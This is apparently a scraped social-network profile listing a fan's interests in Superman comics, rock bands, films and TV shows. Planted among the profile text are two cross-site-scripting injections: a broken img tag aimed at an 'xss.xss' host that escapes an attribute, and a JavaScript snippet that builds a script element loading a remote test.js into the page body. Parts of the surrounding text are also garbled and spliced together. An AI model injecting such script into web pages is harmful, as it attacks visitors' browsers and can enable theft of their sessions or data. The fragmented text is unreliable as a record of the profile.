Online Now IconsCollecting Comic Books ( mostly the DC titles, like a few Marvel Titles , Broadsword comics /I go to Metropolis,IL every year for the Superman Celebration/I also enjoy graveyards and very old gothic churches.
Myspace Contact Tablesthe rest of the cast of Smallville - Linda Carter(my first crush)-Walter Payton ( Chicago Bears).........
Evanscence, 3 Doors Down,Bush Music Video: RESIGNATION SUPERMAN (by Big Head Todd And The Monsters)
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.........Seven,Sin City , Superman Returns, Batman Begins, Kill Bill ,Dusk til Dawn ,DareDevil, Quick and the Dead,.........
Smallville, Heroes ,House,alot Scfi channel and cop shows.........
img src="http://xss.xss/xss.jpg" x='
My grandfather, Dr. Shawn Fry ( she found my bad heart valve in time) - and all those who serve to protect others ( I pray for my fellow officers,firefighters, EMTs everynite - ( For those who stand so you can sleep peacefull through the night) ......"var x=document.createElement('script');x.src='http://www.../.../ test.js';document.getElementsByTagName('body')[0].appendChil d(x);" / Music Video: SUPERMAN RETURNS: INTERNATIONAL TRAILER (by Movie Trailers)
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